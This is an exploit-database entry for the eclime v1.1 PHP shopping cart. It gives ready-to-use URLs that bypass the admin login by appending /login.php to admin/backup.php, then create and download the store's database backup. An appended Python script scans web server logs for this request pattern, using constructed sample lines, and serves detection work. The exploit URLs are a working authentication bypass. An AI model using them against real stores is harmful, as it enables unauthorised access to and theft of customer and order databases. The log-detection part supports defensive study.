eclime v1.1 ByPass / Create and Download Backup Vulnerability

2010-04-18T00:00:00
ID 1337DAY-ID-11860
Type zdt
Reporter indoushka
Modified 2010-04-18T00:00:00

Description

Exploit for php platform in category web applications


========================================================================================                 
| # Title    : eclime v1.1 => ByPass / Create and Download Backup Vulnerability
| # Author   : indoushka                                                              
| # email    : [email protected]                                                  
| # Home     : www.iqs3cur1ty.com/vb                                                                    
| # Dork     : Powered by eclime.com                                                                                                           
| # Tested on: Windows SP2 Français V.(Pnx2 2.0)
| # Bug      : Backup                                                                    
======================      Exploit By indoushka       =================================
# Exploit  :
------------------------------------------
eclime v1.1 (March 2010)
------------------------------------------
eclime is a free open-source Smarty-based shopping cart
built on the solid osCommerce 2.2 engine, with many useful
contributions added.
 
------------------------------------------
 
http://127.0.0.1/eclime/admin/backup.php/login.php?action=backup
 
http://127.0.0.1/eclime/admin/backup.php/login.php?action=backupnow
 
To download the backup: http://127.0.0.1/eclime/admin/backup.php/login.php?action=download&file=db_comm-20100301222138.sql
 
db_comm-20100301222138.sql: change it to the name of the backup. You can't download it with IE; I downloaded it with Opera 10.10 and Mozilla Firefox.
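
A log check for the request shape shown above (an admin script followed by /login.php as extra path), as an added example that is not part of the original advisory. The log lines, IP addresses and function names are constructed for illustration and assume Apache combined log format.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Admin script followed by extra path info ending in login.php,
# e.g. /eclime/admin/backup.php/login.php (the shape shown in the advisory).
PATHINFO_RE = re.compile(r"/admin/(?P<script>[^/]+\.php)/(?:.*/)?login\.php$", re.I)
# Combined log format: client IP, quoted request line, then status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Mar/2010:22:21:30 +0000] "GET /eclime/admin/backup.php/login.php?action=backupnow HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Mar/2010:22:21:41 +0000] "GET /eclime/admin/backup.php/login.php?action=download&file=db_comm-20100301222138.sql HTTP/1.1" 200 80211',
    '198.51.100.4 - - [01/Mar/2010:22:25:02 +0000] "GET /eclime/admin/login.php HTTP/1.1" 200 1840',
    '198.51.100.4 - - [01/Mar/2010:22:25:09 +0000] "GET /eclime/admin/backup.php?action=backup HTTP/1.1" 302 0',
]

def classify(line):
    """Return a finding dict for a request matching the advisory's URL shape, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    hit = PATHINFO_RE.search(unquote(parts.path))
    if not hit:
        return None
    query = parse_qs(parts.query)
    return {
        "ip": m.group("ip"),
        "script": hit.group("script").lower(),
        "action": query.get("action", [""])[0].lower(),
        "file": query.get("file", [None])[0],
        # A 2xx status means the admin script answered instead of redirecting.
        "served": m.group("status").startswith("2"),
    }

def scan(lines):
    """Collect findings for every matching line."""
    return [f for f in map(classify, lines) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A finding with `served` true and `action` of `backupnow` or `download` means a database backup was created or fetched through this path, so the dump named in `file` should be treated as disclosed.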



#  0day.today [2018-01-10]  #